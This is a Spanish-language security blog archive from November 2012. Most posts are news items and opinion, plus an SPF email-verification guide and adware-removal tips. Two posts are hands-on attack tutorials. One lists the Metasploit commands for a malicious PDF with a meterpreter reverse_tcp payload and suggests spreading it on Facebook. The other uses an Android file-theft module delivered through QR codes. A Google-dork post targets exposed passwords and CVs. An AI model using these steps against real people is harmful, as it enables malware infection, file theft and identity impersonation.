viernes, 30 de noviembre de 2012

Como Saber Si El Remitente De Un Email Es Realmente Quien Dice Ser Gracias Al SPF

El SPF (Sender Policy Framework) es un sistema de validación de correos electrónicos para evitar el Spam mediante la suplantación de correo electrónico  Este sistema permite a los administradores especificar a los host (en este caso es el servidor de correo electrónico) mediante la creación de un determinado registro SPF  (o registro TXT) en el DNS.



Estos registros en TXT están totalmente visibles haciendo una petición al DNS y ahora veremos como:

Ingredientes:

  • Windows XP/Vista/7/8
Pensemos que queremos verificar si un correo de Facebook es real, por lo que iremos al terminal de Windows (el cmd de toda la vida, o el símbolos de sistema) [WINDOWS + R y escribimos CMD] y haremos una petición al DNS para saber los servidores que utiliza. (cambe indicar que si el mal no viene de ninguna de esas direcciones IP es mas falso que un billete del Monopoly). Para esto usaremos estos comandos:  
  • Nslookup
  • set  type=txt (para que me devuelva el registro)
  • facebook.com (o la pagina del emisor)







Ahora vamos a nuestro E-mail. Yo he hecho la prueba con Hotmail por que no me ha dado tiempo ha hacerlo con Gmail. (quien lo haga que me envíe un tutorial o un paper). En hotmail es tan fácil como hacer click con el botón derecho del ratón sobre el mail e ir a ver origen del mensaje.



Una vez le demos clic nos saldrá una pantalla con un mogollón de letras tope chulas. Si, todo eso sirve para algo pero nosotros nos centraremos en donde pone (sender IP) y lo comparemos en las ips que hemos pedido al dns.



Si coinciden bingo. Si no, ten mucha precaución con ese mail.

jueves, 29 de noviembre de 2012

Problema De Denegación De Servicio En Tor Corrigido En La Nueva Versión

El proyecto Tor, la superconocida red de anonimato, actualizó hace un par de días con algunas mejoras chulas pero también actualizo algún problema como este. (os debo hablar de su funcionamiento otro día)


El fallo presente en la librería "relay.c" permitiría que un atacante enviara células "SENDME" especialmente manipuladas para alterar la prioridad del tráfico de células en los circuitos de Tor, superando el límite establecido por el propio control de flujo de la red y posibilitando el agotamiento de memoria en los nodos de acceso. Esto provocaría una denegación de servicio al caer esos nodos por falta de recursos.
La vulnerabilidad, que fue reportada en junio (bug 6252) y asignada a un CVE durante esta semana (CVE-2012-5573) ha sido solucionada oficialmente tras la publicación de la versión estable 0.2.3.25.
Para mas información sobre el fallo: http://seclists.org/oss-sec/2012/q4/339 



miércoles, 28 de noviembre de 2012

Los Smartphones y Su Control De Calidad

Son muchas las veces que echamos improperios cuando vemos que nuestro Smartphone se precipita hacia el suelo sin posibilidad de poder detenerlo xD. Los controles de Calidad de los nuevos modelos no pueden ser comparados como el que tubo que pasar el Famoso Nokia indestructible 3310, pero también se han de torturar para tener un nivel de calidad mínima (y los vídeos son una pasada xD).


La verdad es que estos vídeos pueden herir el corazón de una persona con amor a las nuevas tecnologías, pero a lo hecho pecho porque la verdad es que así es como se comprueba la calidad de los productos que salen al mercado. 

¿Que mejor manera que probandolo con tu propio culo no? 

De este no me fío mucho por el cambio de escena, pero el lanzamiento al agua amarilla es de campeonato. XD

Ahora entendemos cono consiguieron el móvil indestructible. 

Mas sobre la infrastructura de Calidad de Nokia

Si tenéis curiosidad por saber mas os dejo la fuente: 

martes, 27 de noviembre de 2012

Ataque a Móviles Android Utilizando Codigos "Evil" QR

Cada vez es mas fácil toparte con estos códigos allá donde vayas y aunque su funcionamiento parece fácil podemos saber poco o casi nada del sitio donde nos mandan una vez escaneado el código con nuestro móvil   Hoy he hecho el experimento y la verdad es que el resultado a sido bastante placentero.

Si alguien tiene curiosidad de donde lleva la URL de este código
es el de la portada de la Wikipedia en Español  

 El proceso no tenia que ser difícil, solo tendríamos que decirle a metasploit que se ponga a escuchar por una IP y un puerto concreto en la maquina del atacante y crear un QR en forma de etiqueta. 

Para todo esto utilizaremos un modulo de metasploit llamado auxiliary, el cual nos proporciona de herramientas externas para el programa como por ejemplo: escaneres, herramientas de denegación de servicios, sniffers, etc. Mas concretamente usaremos el siguiente exploit:  [use gather/android_htmlfileprovider El cual tiene un rango medio y nos permita el "robo" de archivos de forma remota. 

Ingredientes: 
    • Distribución Linux:  Backtrack 5 - R3 ( R1 y R2 también sirven pero ya que estáis bajaros la ultima versión desde la pagina oficial que es gratis. ) http://www.backtrack-linux.org/
    • Tener instalado el Metasploit Frameworks (Si os habeis bajado la ultima versión viene de serie con el S.O)
    • Terminal Android.

Código:
    • msfconsole <-- con este comando abrimos a Metasploit 
    • use gather/android_htmlfileprovider <-- selecionamos el exploit que os he explicado antes
    • set FILES system/etc/host <-- en este comando le decimos que archivo queremos extraer de la victima, yo he elegido host porque es la ruta mas clara que tengo. 
    • set URIPATH / <-- hay un espacio enre Uripath y la [/] este comando sirve para crear un Identidicador de Recursos Uniforme de forma aleatoria. URI es una cadena caracteres la cual se utiliza para identificar un nombre o un recurso. 
    • set SRVPORT 8080 <-- Seleccionamos el puerto por el cual nos pondremos a la escucha. 
    • run <-- ejecutamos el exploit 


Ahora nos abrimos una cuenta en DynDNS (es un sistema que nos ofrece la posibilidad de poder tener nuestro servidor con una dirección como stateX.dyndns.com), aunque antes era gratuito ahora es de pago pero te dejan probarlo durante 14 días.  

La configuración es muy simple, solo se trata de rellenar el cuestionario y de poner todos los datos. Ojo pide datos de tarjeta de crédito pero como yo tenia alguna en la que solo había 1€ pues la he metido y pienso borrar el pedido antes de esos 14 días para que no me cobren ninguna tasa rara. 

Y nada, con nuestro dominio y con nuestros puertos debidamente abiertos. Vamos a cualquier pagina de generación de Codigos QR (yo he hecho la prueba con http://qrcode.kaywa.com/) y a distribuir códigos por los sitios en los que tu ingeniería social  pueda encontrar. 


lunes, 26 de noviembre de 2012

Usando Google Como Proxy

Si muchas veces os habéis preguntado como configurar un servidor proxy para ser "anónimo" en la red (ya hablaremos del peligro de usar proxys sin un mínimo de conocimiento) se habrá roto la cabeza cuando la verdad es que Google nos lo esta poniendo fácil para ser "anónimos" delante de una web. Usando este método el que quiera conocer lo que miras se encontrará con un servidor de Google y no toda la gente podrá hacer que esta empresa suelte la información que necesitan. Pero al menos sabes que quien esta leyendo tu información es Google o algún [bicho-pata con melena] metiéndote un javascript mientras pasas por su proxy. 

Cabe explicar que solo es un experimento que he echo después de leer [Hackers & Developers Magazine] el merito es suyo yo solo he me dedicado a juguetear con esa posibilidad. 
Usar el proxy de Google es tan fácil como hacer una consulta al traductor de esta misma empresa con el siguiente código: (pensando que quisiéramos entrar en este blog así quedaría el código)
http://translate.google.com/translate?sl=en&tl=es&u=http://infostatex.blogspot.com.es
Si os fijáis le estamos diciendo que nos traduzca del ingles sl=en  al español tl=es la pagina que queremos visitar por lo que en el momento del visionado nos la encontraremos en español y gracias al botón de texto original de la derecha podremos verla de la forma original.

[Eugenia Bahit] explicó en la revista antes menciona la posibilidad de saltarse restricciones X que tengan bloqueada la pagina que vayamos a visitar.

 ¿Pero nuestra IP ha cambiado?

Buena pregunta, para eso esta mi parte del experimento. Primero comprobé mi dirección IP sin el traductor:




Y ahora las pruebas que realmente están pasado los datos por un servidor proxy de google.


 Como veis ahora estamos en el traductor de google y me esta dando otra ip empezada en 7 y me esta diciendo que realmente están pasando mis datos por el proxy. Pero digamos que no me fió y quiero ver la precedencia de esa IP y de poder ser geolocalizarla. Pues nada nos ponemos a satisfacer la curiosidad y encontramos esto: 


Pues si, totalmente cierto que estamos dentro de un proxy de la compañía y encima tenemos posición donde se ubica (por si le queréis ir a dar una vuelta xD) queda algo lejos. 

domingo, 25 de noviembre de 2012

Como Eliminar Las Odiosas Barras de Tareas, Cambiadores de Paginas de Inicio y Ese Clase de Porquerías.

Nadie puede decir que este libre de comerse algún ataque como este.  Muchas veces nos creemos que el botón de Siguiente es nuestro colega y lo que realmente estamos haciendo es dar permiso para que nos instalen malware de todo tipo.

Uno de los mas conocidos es babylon. 

Tengo muchas criticas acerca de Babylon, como que te obligue a instalarlo aunque se lo niegues, pero ya se ha encargado [ADSL zone] de hacerlo por mi. Así que os voy a dar unos consejos y explicaciones de como proceder para la eliminación de este incordio. 

  1. Primeramente nos hemos de acostumbrar a leer todo lo que instalamos en nuestro equipo. Si lo hacéis descubriréis que la mayoría de este "malware" se puede evitar. 
  2. En el caso de que se haya instalado alguno de estos componentes. (podríamos hacer la desinfección manual, pero ya que la informática esta para automatizar operaciones comunes ...) Acudiremos a la ayuda de [AdwCleaner] esta herramienta esta diseñada para desinstalar lo mejor posible todo estos dolores de cabeza. 
  3. Ya que posiblemente después de la desinstalación las paginas de inicio aun estén afectadas. Así que tendremos que cambiarlas manualmente dependiendo de que navegador utilicemos. 
Google Chrome: 


Una imagen vale mas que mil palabras.

Mozilla Firefox: 








Internet Explorer: 


















Espero que haya quedado clara la manera de volver a poner nuestra pagina de inicio después de la entrada del malware y como evitar y desinfectar este tipo de amenazas. 

sábado, 24 de noviembre de 2012

Belkin Y Sus Router Con Clave Wpa 2 - PSK Por Defecto En Peligro

Posiblemente cuando empezamos en el mundo de la seguridad informática una de las primeras cosas a las que metemos las zarpas, supongo porque sin Internet no somos personas xD, es a vulnerar la seguridad de los routers de nuestros vecinos a ver si nos podemos ahorrar unos dineros. La verdad es que estas redes han sido totalmente sodomizadas, pero este fallo hace mas fácil la intrusión a las redes Wpa2-PSK.


El fallo se debe a que la clave por defecto es muy fácil de averiguar. Solo tendríamos que coger la clave MAC de la WAN (que esta en la pegatina famosa de debajo del router) y con remplazar un carácter por otro en hexadecimal y ya tendríamos la clave que se puede hacer con papel y lápiz ... 

Los routers que tiene este este fallo son los Belkin's Surf N150 Model F7D1301v1, N900 Model F9K1104v1 y el N450 F9K1105v2. Esto no quiere decir que otros modelos no puedan estar afectados pero ya se ha avisado del fallo a Belkin y están en proceso de repararlo. 

Leído en:

Fuente:

viernes, 23 de noviembre de 2012

Angry State 5.- Hackeo y Música.

Hace ya un par de semanas, husmeando por las paginas y blogs de rigor, me tope con un articulo de [Security By Default] donde se hablaba de la música en las películas de hackers y me ha inspirado.

Normalmente escucho muchísimos estilos de música desde Heavy hasta clásica o rap pero nunca pasando por el reggeton (o como se escriba). Aunque en el momento en el que me pongo con mis "investigaciones" siempre, absolutamente siempre las hago escuchando la banda sonora del Fantasma de la Opera en Inglés. En mi opinión tiene tranquilos, animados, tristes y un punto de rock lo que la hace muy equilibrada y relajante para trabajar con ella.

Pero bueno siempre acaba pasando algo así en mi habitación:


PD: Fijaros bien en el fantasma. 


A que ahora con barba lo reconocéis se mejor. XDDD



jueves, 22 de noviembre de 2012

Pdf Y Metasploit (Parte 1) .- Creación Y Difusión.

Hace ya un tiempo que el ataque con PDF maliciosos esta dando muy buenos resultados. Un PDF de ese tipos tarda mas de 5 minutos en crearse y buscando un medio de difusión correcto puede causar estragos a aquellos que no actualicen su software adecuadamente.


Adobe esta tomando todas las medidas que puede pero no son suficientes. Ya dedique [una tira] respecto a lo que pensaba de la cantidad de ataques que esta recibiendo esta compañía, pero me rondaba la curiosidad y las ganas de poder hacer un PDF malicioso y analizarlo un poco.  Así que me he puesto a ello.

El proceso es fácil, rápido y solo necesitamos los siguientes Ingredientes: 
    • Distribución Linux:  Backtrack 5 - R3 ( R1 y R2 también sirven pero ya que estáis bajaros la ultima versión desde la pagina oficial que es gratis. ) http://www.backtrack-linux.org/
    • Tener instalado el Metasploit Frameworks (Si os habeis bajado la ultima versión viene de serie con el S.O)
    • Un Windows entre XP-7 el cual explotar (os sugiero que lo proveéis en una maquina virtual) 
    • Dicho Windows ha de tener una versión de Adobe Reader 9.1 o menor. 
Aunque en esta primera parte solo nos centraremos en la creación y la difusión de este PDF mas vale que tengáis preparada el Windows 7 para mas adelante. 

Para esta investigación nos basaremos en [Adobe PDF Escape EXE Socila Engineeringdado que tiene un rango excelente y actúa en una versión de Adobe no muy vieja. Empecemos a darle caña.
  • Una vez en Backtrack abrimos la terminal y escribimos: msfconsole esta operación suele tardar unos minutos. 
  •  Cuando acabe de cargar pondremos el siguiente codigo: 
Use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs <-- (seleccionamos el exploit que vamos a usar, el que previamente habremos buscado en la web o en nuestro repositorio y se adecue a nuestras necesidades)
 Set payload windows/meterpreter/reverse_tcp <-- (definimos el [payload] que devolverá el [meterpreter])
Set filename XXXX_XXX.pdf <-- (creamos el archivo pdf con el nombre que queramos)
Set lhost 192.168.1.23 <-- (definimos la IP del atacante por la cual nos pondremos a la escucha en el momento que la victima abra el pdf)
Set lport 8080 <-- (definimos el puerto del atacante, también sera importante para escuchar mas adelante) 
Ya tenemos en nuestro poder el Pdf Malicioso dispuesto a ser distribuido. Tened en cuenta que se guarda en una ruta especial del root/.msf4/local , si no lográis ver la carpeta apretad CONTROL + H  para desocultarlas.

Ahora solo nos queda distribuirlo por donde los antivirus nos dejen. He hecho la prueba con [Virus Total] una Web donde puedes puedes comprobar si un archivo está libre de virus y de la que ya os hablamos aquí en los comienzos de este blog (es la segunda entrad xD). El resultado no ha podido sorprenderme mas, mi pdf se llama Cambios_En_La_Web.

O.O se lo comen 20 antivirus del mercado. 

Por lo que alguna presa grande del sector debe haber caído no? En efecto.

O.O Kaspersky me has fallado. Pero tranquilos que Avast, AVG y Windows Defender si que los caza..

Lo primero que se nos viene a la cabeza a la hora de distribuirlo es a empaquetarlo en un email y tirar de dotes de Ingeniero social para que la victima acabe descargándose el archivo. No va a ser tan fácil ahora mismo la mayoría de sistemas de correo electrónico escanean los archivos que subes, este truco hace tiempo que se conocen así que ya han tomado medidas para ello. Un ejemplo claro son Hotmail con el Trend Micro Pc Cillin o Gmail con su Sophos (aunque solo es un rumor). 

No me esperaba menos de Gmail .

¿He dicho que no podía ser tan fácil? Perdón me he equivocado xDD

0.0 ¿tendría que haber avisado a facebook de esto? 

En efecto en Facebook no hay antivirus así que favorece el crecimiento de estos ataques. Solo has de hacerte pasar por una empresa X que ofrece Y gratis y te entrega un catalogo para que te lo mires guiño guiño. Facil, comodo y en un canal con millones de personas. 

Ahora el problema sera burlar al antivirus que tenga la victima instalado en su equipo y aprenderemos a analizarlos para estar seguros. Pero eso lo dejaremos para otra entrada. 

_______________________________________________________________________________
Las Gracias A Quienes Se Las Merecen:
----------------------------------------------------------------------------------------------------------.

miércoles, 21 de noviembre de 2012

Restauran A WITCH .- El Computador Digital Mas Antiguo De La Historia Vuelve A Funcionar.

El proceso de restauración ha sido de tres largos años pero gracias al Museo Nacional de Computación (TMNOC) del reino unido va a poder ponerse en macha una vez mas.


Esta maravilla de 2,5 toneladas fue diseñada en el año 1949, producida en el 1951 y estuvo en activo hasta 1971. Usaba válvulas termoionicas como contadores de pulso y fue uno de los padres de los ordenadores de hoy en día.

Ahora seguirá en el TMNOC junto a la mayor colección de computadores de Europa. Cuesta imaginar de estas maquinas, cual funcionamiento casi podemos deducir, hayan sido los abuelos o familiares de las maravillas que ahora tenemos entre los dedos. Hemos de pensar en el trabajo y el ingenio que a costado el portatil/ordenadore de sobremesa/smartphone que ahora usamos para dar vueltas a facebook o editar nuestros documentos.

A veces hace falta recordar a estos titanes de la informática para valorar lo que ahora tenemos. 

Para quien tenga mas curiosidad sobre WITCH:
http://www.siliconweek.es/noticias/restauran-computador-digital-mas-antiguo-historia-29752

martes, 20 de noviembre de 2012

¿Quién Me Va A Atacar A Mi? .- Cada Dia se detectan mas de 9.000 Webs Peligrosas

La compañía Symantec logra detectar al día 9314 paginas en la red que pueden resultar un peligro a cualquier usuario. No es de estañar cuando un 61% de estas paginas infectadas sean web comunes. De esta manera tu puedes estar entrando en la web de Apple y ella estar mandándote de vuelta unos bonitos scripts que después harán maravillas en tu navegador.


Muchos sois los que me hacéis la típica pregunta ¿Quién me va a atacar a mi?. Ahora mismo se ataca de forma aleatoria, son mas los ataques automatizados que los hechos a una persona en concreto. Todos estos ataques randoms van con el propósito de convertir tu PC en un punto mas de su botnet (Red de ordenadores zombies por así decirlo) la cual se utilizará después para robarte la información que el mafioso, con gato y sentado en su butaca con un whisky añejo quiera. Es mas ahora se hacen este tipo de ataques para obtener cuentas de banco de quien sea y después destinarlas según los fondos de los que dispongan. Eso sin pararnos a pensar lo que harán con los vídeos de todas las web cams infectas. 

lunes, 19 de noviembre de 2012

El Robo De Un Portátil de la Nasa Pone En Riesgo Un "Numero importante" De Empleados.

El robo del portátil tubo lugar en el coche de uno de los empleados en el mismo día de Halloween. La información que contenía el terminal no estaba completamente cifrada y esto puede poner en jaque a los empleado de la Nasa. 


Tal es el la importancia de este robo que la Nasa esta empezando a evaluar este incidente,  investigar cual es el alcance y tomando medidas para poder minimizar los daños o molestias a dichos empleados.
Mi opinión es que si uno de esos empleados tenían una cuenta de administrador posiblemente ya estén mapeando a la Nasa e intentando barrabasadas. Supongo que a sospechas de esto  la Nasa ha activado su plan de no dejar salir ningún portátil de su recinto sin la debida información completamente cifrada para que esto no vuelva a pasar.

Si tenéis curiosidad hasta donde han podido llegar los Hackers os dejo el Link: http://threatpost.com/en_us/blogs/stolen-nasa-laptop-puts-large-number-employees-risk-111412 

domingo, 18 de noviembre de 2012

Google Hacking.- Fácil y Cómodo.

Hoy vamos ha hablar un poco de las posibilidades que puede dar Google a la hora de rastrear nuestro objetivo y, hasta ,encontrar alguna vulnerabilidad, la cual nos haga entrar en el sistema de forma fácil.


Que podamos realizar este tipo de ataques se debe a la gran extensión que tiene la araña de este buscador y si la información de una empresa no ha sido debidamente securizada Goolge la Indexará. Lo que aprovecharemos nosotros, en el momento que queramos saber mas sobre una empresa, para realizar un mapeado de la red interna de esa empresa o, incluso para saber las contraseñas de los diferentes usuarios. 

Dependiendo de la búsqueda que utilicemos podremos encontrar información muy diferente por ejemplo utilizando la query: filetype:xls "username | password" ( le pedimos al buscador que nos encuentre en todos los archivos .xls en los que haya la palabra username y password escrita en ellos) y nos encontraremos con esto: 


Ese tipo de búsqueda es algo básica y con un poco de entrenamiento podemos utilizar lo aprendido para buscar a quien se le podría suplantar la identidad en la red gracias a que a puesto toda la información personal en su Curriculum. El cual subió o imprimió desde una impresora pdf online. 

   Este segundo ejemplo no me esperaba que funcionara tan bien. 
Pero como este Curriculum hay 10 paginas de material exactamente igual.

 No me voy parar a enseñaros todo los tipos de operadores que se pueden dar cuando este trabajo ya lo han hecho mucha gente bastante mas apta y preparada que yo. 

Si queréis probarlo vosotros mismos. Os recomiendo el paper de Johnny Long, esta en inglés pero maravillosamente explicado: 


sábado, 17 de noviembre de 2012

Seguridad Informática del Ministerio de Defensa Español

Hace 2 días hablamos de los [sistemas SCADA] me pregunté como harían nuestros ejército para defendernos de este tipo de ataques "low cost". También hace dos mese o un poco meno se dijo que España es uno de los países mas débiles en le red. Esta conferencia se explica muy bien los recursos que tienen y como los llevan a cabo para dar respuesta a los estos problemas. 


La verdad es que merece la pena saberlo y almenos nos tranquiliza un poco. xD 

viernes, 16 de noviembre de 2012

Angry State 4.- Ataque Hacker a Adobe

Últimamente el numero de vulnerabilidades encontradas en sistemas Adobe era impresionante, tanto que los malos se han dedicado ha explotarlo hasta niveles insospechados. Pensad que casi todos tenemos el Adobe Reader instalado para leer nuestros pdf de forma cómoda y este producto no solo esta en Windows si no que también en Mac y Linux.


Adobe Systems ya a confirmado el ataque por porte de un grupo de hackers. El ataque también ha hecho que cerraran su foro de usurarios. El Hacker en cuestión dice haber robado credenciales de 150.000 usuarios y de algunos socios en ese foro, como protesta por la lentitud en arreglar sus problemas de seguridad.

La verdad es que 150.000 usuarios me parece una pasada para dar un toque de atención. Pero lo que si que ha quedado claro es que no solo pueden asegurar su producto si no que son incapaces de asegurarse ellos mismo. También pienso que el numero de vulnerabilidades es muy grande como para que puedan solucionarlo de forma rápida, así que masacrar a la compañía en estas circunstancias no me parece apropiado.

jueves, 15 de noviembre de 2012

Sistemas SCADA - ¿Hasta Que Punto son Vulnerables?

Los sistemas SCADA  son los grupos de software que se dedican a la supervisión y al control de procesos industriales a distancia. Esto facilita mucho el trabajo a las empresas pero también se lo pone fácil a cualquiera que tenga ganas de apagar una industria desde su casa o hacer estallar infraestructuras criticas para el ejercito del país al que se quiere atacar. 


Estos sistemas se han estado fuera del interés común, no fue hasta el 2010 después de los virus Stuxnet y Flame cuando se han empezado a registrar un mayor numero de ataques. Por esa razón el numero de vulnerabilidades se ha disparado en los últimos 2 años. 

Aquí tenéis el informe para que os acojonéis un poco mas:
http://www.ptsecurity.com/download/SCADA_analytics_english.pdf

miércoles, 14 de noviembre de 2012

¿Como Funciona La Seguridad Mi Tamagochi/Smartphone?

El Lunes por la noche buscando canciones en YouTube, me sorprendió que me recomendase una conferencia de Chema Alonso donde explicaba el problema con los proxys. He de admitir que nunca me fié de ellos y ahora me fio menos por todo lo que se explica en esa ponencia. ¿Alguien se anima a montar uno?  ;) Pero bueno lo que me llamo la atención es el desconocimiento de sistemas que hay respecto a los terminales móviles como podéis ver en el minuto 20:32 del siguiente vídeo.



No fue hasta el martes a la noche cuando me puse realmente a buscar ese paper de IOs y hasta esta tarde cuando me ha dado por buscar información sobre los de Android y BlackBerry. Espero que os lo leáis y creo que son cosas que tendríamos que saber al menos a los que nos gusta enredar con los Tamagochis. Me encantó la palabra para referirse a los Smartphones la usaré a partir de ahora. 

Aquí tenéis los diferentes papers:

Oficiales: 

Paper de IOs: 
Paper de Blackberry:

Por Tecnicas de Reversing: 

Paper Android: 

Si alguien encuentra algún paper oficial mas, estaré encantado de que me deje un comentario diciendo: AQUÍ TIENES EL PAPER OFICIAL DE XXXXX APRENDE A BUSCAR, CAPULLO. 





martes, 13 de noviembre de 2012

Ataque Informático a la Nueva Web Del Senado

Ayer por la tarde La nueva pagina web del Senado [ESTA] sufrió un ataque de denegación de servicio que provoco la caída del servidor y tubo bloqueada la pagina el día de su puesta en funcionamiento.


Un día ya hablaremos técnicamente de como se realizan este tipo de ataques (Tutorial Incoming). Lo que si que ha quedado claro es que los [448.819,25 euros] que costo la renovación para la web no han sido suficientes para compra lo que necesitaban para evitar estos ataques o alguien a cobrado muy cara una web que puede dejar de funcionar a la mínima que un grupo anónimo, de estos que rondan a la red, haga de las suyas que razones no les falta después de que el [Senado se gastara 55.000 euros publicos en llamadas al 902 y SMS a concursos]. Solo he puesto dos opciones por que no me gustaría pensar que parte de ese dinero no ha llegado a invertirse en la web.

Fuente: http://www.elmundo.es/elmundo/2012/11/12/navegante/1352742760.html?a=7cc8583b04215d9499f0aec538f5e44d&t=1352750419


lunes, 12 de noviembre de 2012

6 Boletines De Seguridad El Próximo Martes Por Microsoft

Hoy Microsoft ha publicado un avance de los boletines de seguridad que publicará el próximo martes. Esta será la primera vez que Windows 8 y Windows Server 2012 dentro de estos boletines.



Microsoft también lanzará una actualización para su herramienta "Microsoft Windows Malicious Software Removal Tool" que estará disponible desde Microsoft Update, Windows Server Update Services y su centro de descargas.
Desde Hispasec Sistemas se informará puntualmente sobre los nuevos parches a través de este boletín dando una información más detallada sobre los boletines de actualización de Microsoft.
He leído por encima el avance de los boletines y no tienen desperdicio alguno. Os aconsejo que le deis una ojeada a las cosillas que han tenido vulnerabilidades dentro de todo el paquete Microsoft. 

domingo, 11 de noviembre de 2012

iPad Vs Aviones ¿Como Afectan Los iPads a los Controles De Un Avión?

Solo hace falta entrar es un metro/tren para darte cuenta del gran numero de tabletas, ebooks, móviles que hay ahora mismo entre nosotros. Cada uno de esos aparatos podría emitir ondas electromagnéticas que en el caso de estar en un avión podrían interferir a la hora de despegar y aterrizar.

La FAA/siglas en inglés/(Autoridad de Aviación de Estados Unidos) esta revisando los estudios que argumentan esta medida. Lo cual podría cambiar las normas para estos dispositivos en los aviones. 


Actualmente lo único que se puede usar es un iPad y solamente esta permitido al personal del avión. Lo que ha despertado el debate después de que varios periodistas se quejaran.
   
Stephen Rooney, de la Autoridad de Aviación Civil en Reino Unido, dice que estarían dispuestos a cambiar las normas si se demuestra que los aparatos electrónicos no afectan a la seguridad del vuelo.

"La tecnología evoluciona todo el tiempo y eso significa que tenemos que hacer revisiones a estas normas, así que estamos abiertos a cualquier nueva investigación", expresó a la BBC.

Por el momento, todo parece quedar en manos de la FAA, que se estima podría dar su veredicto dentro de un año.

Con información de BBC Mundo

Si queréis saber mas sobre la investigación que se ha llevado a cabo de dais a este link: http://www.kuviajes.com/2012/11/09/puede-un-ipad-derribar-un-avin/

sábado, 10 de noviembre de 2012

Famosos Comprando Seguidores? Como saberlo?

Después del fallo de seguridad que agitó ayer a [Twitter] y después de ver muchísimos perfiles que del día a la mañana tienen cientos de seguidores me dio por investigar la manera de poder identificarlo.


Hay muchas paginas en Internet que te venden seguidores gratis o a un coste razonable dependiendo al calidad de estas cuentas "falsa/hackeadas". Esto se puede hacer vía Internet, fácil y solo teniendo que apretar un botón mientras estas sentado en tu silla. Lo cual hacer este tipo de trampas es un reclamos mas que evidente para ciertos sectores.

Pues identificar quien esta haciendo este tipo de trampas es aun mas fácil. Vamos directos a la pagina de http://fakers.statuspeople.com/  Iniciamos con nuestra cuenta de Twitter para autentificarnos y acto seguido podremos comprobar las cuentas de nuestros "amigos". Fácil, cómodo y para toda la familia.

Yo he hecho 3 pruebas:

La primera esta hecha con el Twitter de esta pagina con sus 4 grandes seguidores. 100% Good


La segunda es la cuenta de un colega. Esta cuenta ya tiene un tiempo así que es posible encontrarse algo raro.

Como veis 0% de Fakes por lo que no ha usado nada raro pero 16% de cuentas que no se usan actualmente

La ultima la he hecho al Twitter de un famoso bastante conocido y me he llevado la siguiente sorpresa. 

32% de Falsos, 48% de inactivos (que son bastantes algo sospechoso veo por allí) y solo un 20% de buenos .... alguien nos debe una explicación creo yo xD. 


PD: Cuando estaba metido en el tema de los Fakers no podía sacarme a Eduard Punset de la cabeza xD 




viernes, 9 de noviembre de 2012

Liberado DVD De La DEFCON 20


Para los que no conozcáis la DEFCON es una de las mas viejas convenciones Hackers normalmente en ubicada en la Vegas.

Como os imaginareis en estas convenciones debe haber material para aprender y trastear hasta aburrir. Pues has liberado el DVD con toda la información de cada una de las conferencias que se dieron en las veinteava edición del congreso.

La verdad es que hay muchísimo material y no tiene desperdicio.

Descargar:  https://media.defcon.org/dc-20/defcon-20-dvd-original.rar

jueves, 8 de noviembre de 2012

Angry State 3.- II CONGRESO DE SEGURIDAD NAVAJA NEGRA


" Los días 30 de noviembre y 1 de diciembre tendrá lugar en Albacete la segunda edición del congreso de seguridad informática 'Navaja Negra'.

Este congreso cuya entrada es GRATUITA, es una excelente oportunidad de poder asistir a un buen número de charlas a cargo de ponentes de muy alto nivel que tocarán temas punteros.




La organización ha anunciado -entre otras- las siguientes charlas:

  • All your appliances are belong to us. Presentación de un 0-day
  • Show me your Intents
  • HASH COLLISIONS: Welcome to the (un)real World!
  • Take a walk on the wild side
  • A brief introduction to reversing code with OllyDbg and other tools
  • From mail to jail: Exploit your ex.girlfriend
  • (in)Security in Mobile Communications
  •  IPv6 vs IDS, se aceptan apuestas...
la lista completa de charlas se puede consultar aquí

Y la lista de ponentes, entre los que podemos encontrar a Daniel Medianero o Mario Vilas, se puedeconsultar aquí

En definitiva, un montón de buenas charlas + un montón de buenos ponentes en un magnífico congreso, a poco más de 250km de Madrid (la organización ofrece descuentos para aquellos que se desplacen vía Renfe)

Para apuntaros lo podéis hacer aquí: http://www.navajanegra.com/inscripcion.aspx  "




miércoles, 7 de noviembre de 2012

Gabón Cierra La Nueva Pagina de Megaupload.

Kim Dotcom no tendrá la dirección mas corta de todo Internet. El dominio Me.ga ha sido suspendido por el Ministerio de Comunicación de Gabón, dirigido por Blaise Louembé con la finalidad de "proteger los derechos de autor y luchar contra la "cibercriminalidad" 


Cada vez que veo una noticias como esta me doy cuenta que Internet ya no es un mundo tan bonito. Esta claro que Kim encontrará otra dirección para poder alojar el nuevo proyecto de Megaupload pero cada vez nos estar recortando mas libertad en un mundo que ellos temen y que no entienden ni quieren entenderlo. Aun no me puedo hacer a la idea pero esta muy claro que Internet ya no es nuestro si no de ellos. 


Si queréis saber mas sobre el cierre de Me.ga os dejo la URL: http://tecnologia.elpais.com/tecnologia/2012/11/06/actualidad/1352230334_978614.html

martes, 6 de noviembre de 2012

MUNDO HACKER TV - TEMPORADA 2 - PG 10- Seguridad En Teléfonos Móviles.

Ya hemos hablado varias veces de la seguridad en nuestros smartphones. Pero hay gente que se cree que por llevar el termial rooteado hace que sea mejor que el resto. En el programa de hoy de los amigos de Mundo Hacker TV nos dejan bien claro que hacerle el jailbreak o darnos permisos de root en nuestro smartphone nos deja al descubierto de numerosas vulnerabilidades. 



Me encantan estos tios, la verdad es que ya hace tiempo que los ando siguiendo y su manera de contar las cosas sin pelos en la lengua se merece una matricula de honor. Espero que valoréis el trabajo que hacen para poder emitir cada mes. Difundir esta información nos es fácil, hay muchos que les quemarían el la hoguera medieval por divulgar esa información. 

lunes, 5 de noviembre de 2012

Curso de Criptografia por la Universidad de Stanford y Gratis

En este blog hemos hablado de diferentes formas de cifrar datos. Pues ya es hora de ponernos al lio con el curso de de criptografia que ofrece la Universidad de Stanford totalmente gratis y online. El curso a empezado hoy, esta totalmente en ingles y son 6 semanas de curso calculando 5~7 horas a la semana de dedicación.


Pues ya sabeis, yo ya estoy apuntado y si alguien se anima nos ponemos 100% a ello. Bueno, os dejo la URL para que os informéis y apuntéis al curso: https://www.coursera.org/course/crypto

Gracias al Blog de [Seguridad a lo jabalí] por el chivatazo. 

domingo, 4 de noviembre de 2012

Cierre de la No Con Name 2012 State X Inside Agradecimientos.

Hace ya un par de meses o menos os hablé de este [congreso de seguridad informática] el cual venia a Barcelona. Yo le eché un poco de cara y pregunté a ver si alguna alma caritativa me podría colar. Cual fue mi sorpresa  que Mercè Molist de [HackStory] me invitara a ir al congreso con la condición de vender camisetas. (Si tios, soy el Chico de las camisas de Hackstory)



